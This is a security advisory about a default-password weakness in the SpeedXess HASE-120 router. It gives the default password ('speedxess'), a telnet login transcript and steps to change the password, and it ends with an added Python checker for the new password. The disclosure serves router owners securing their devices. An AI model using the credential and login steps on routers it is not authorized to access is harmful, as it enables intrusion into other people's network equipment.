SpeedXess HASE-120(IPOA Router) Default password vulnerability

by Secret (sale2001@orgio.net)
(WOWHACKER: http://www.wowhacker.com)

-=Content=-

Too many routers are exposed to the default password problem, so I am writing this for the security of routers. This is not for attack but for security.

I came to know that many companies use the SpeedXess HASE-120 router, but they don't seem to be aware of this problem, or don't care. I happened to connect to a SpeedXess HASE-120 router one day. The SpeedXess HASE-120 may be one of the routers most often supplied by ISPs. I could guess the default password easily. But they don't seem to care because the router is not considered important.

If you use the default password of the SpeedXess HASE-120 router, change it now.

[exploit]:

The default password is easy to guess. Look at the text logo! And guess! The password is "speedxess".

telnet Target (target: speedxess hase-120 router address)

[ASCII-art text logo banner]

SpeedXess HASE-120(IPOA Router) Application Start...
Welcome to HASE-120(IPOA Router) Management Interface
Enter Password: <------ master password input : speedxess

HASE-120(I) - Main Menu
[S] System
[A] Atm interface
[D] Dsl interface
[E] Ethernet interface
[I] IPOA interface
[R] Router
[X] eXit
Enter Selection: X
Do you want to exit? (Y)es, (N)o : YES
Session End
Connection closed by foreign host.
[secret@secret:~]$

After connecting, we can change information through the System menu, including the router's setting values.

[solution]:

1. Connect to your router.

2. Enter "S".

HASE-120(I) - Main Menu
[S] System
[A] Atm interface
[D] Dsl interface
[E] Ethernet interface
[I] IPOA interface
[R] Router
[X] eXit
Enter Selection: S

HASE-120(I) - Main Menu - System
Firmware Version HASE-120-1101
System Uptime(YYMMDDhhmmss) ??:??:??:??:??:??
Name of System Owned by Secret
Contact Name Secret Secure Lab
Location France
Ethernet Address 00:00:??:??:??:14
IP Address 211.xxx.xxx.xxx
Subnet Mask 255.255.255.xxx
[P] Password change
[F] Firmware upgrade
[S] Setting values
[R] Reset system
[I] rs-232 Interface
[A] ARP table
[X] eXit
Enter Selection:

3. Enter "P" and then change the password.

Enter Selection: P
Enter New Password (up to 10 characters):
Re-enter New Password:
Recording Changes. This may take a while...Done
Password is changed successfully.
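
The default password can be read off the login banner, so the replacement chosen in step 3 should not be derivable from that banner either, and it has to fit the 10-character prompt. The following check is an added example, not part of the original advisory or of any SpeedXess tooling; the function names and the character-swap table are assumptions made for illustration.

```python
import re

MAX_LEN = 10  # limit printed by the router's "Password change" prompt
# Text of the login banner as shown in the session above.
BANNER = "SpeedXess HASE-120(IPOA Router) Management Interface"
# Assumption of this example: a small table of common character swaps.
SWAPS = str.maketrans("0134578@$", "oleastbas")


def normalize(text):
    """Lower-case, undo common character swaps, drop punctuation."""
    return re.sub(r"[^a-z0-9]", "", text.lower().translate(SWAPS))


def banner_tokens(banner=BANNER):
    """Map each normalized banner word of 4+ characters to its original form."""
    words = re.split(r"[\s()]+", banner)
    return {normalize(w): w for w in words if len(normalize(w)) >= 4}


def check_new_password(password, banner=BANNER):
    """Return a list of problems; an empty list means the candidate passes."""
    if not password:
        return ["empty password"]
    problems = []
    if len(password) > MAX_LEN:
        problems.append(f"longer than the {MAX_LEN} characters the prompt allows")
    norm = normalize(password)
    for token, word in banner_tokens(banner).items():
        # Catch the word itself, decorated variants, and its reverse.
        if token in norm or token[::-1] in norm:
            problems.append(f"derived from banner word '{word}'")
            break
    return problems


if __name__ == "__main__":
    # Constructed candidates, not taken from any real device.
    for candidate in ["speedxess", "Sp33dX3ss!", "HASE-120", "q7Vr2mKx9T"]:
        print(f"{candidate!r}: {check_new_password(candidate) or 'ok'}")
```

Run it on a workstation before typing the new password into the router's menu; a candidate that returns an empty list is neither too long for the prompt nor a variant of a word in the banner.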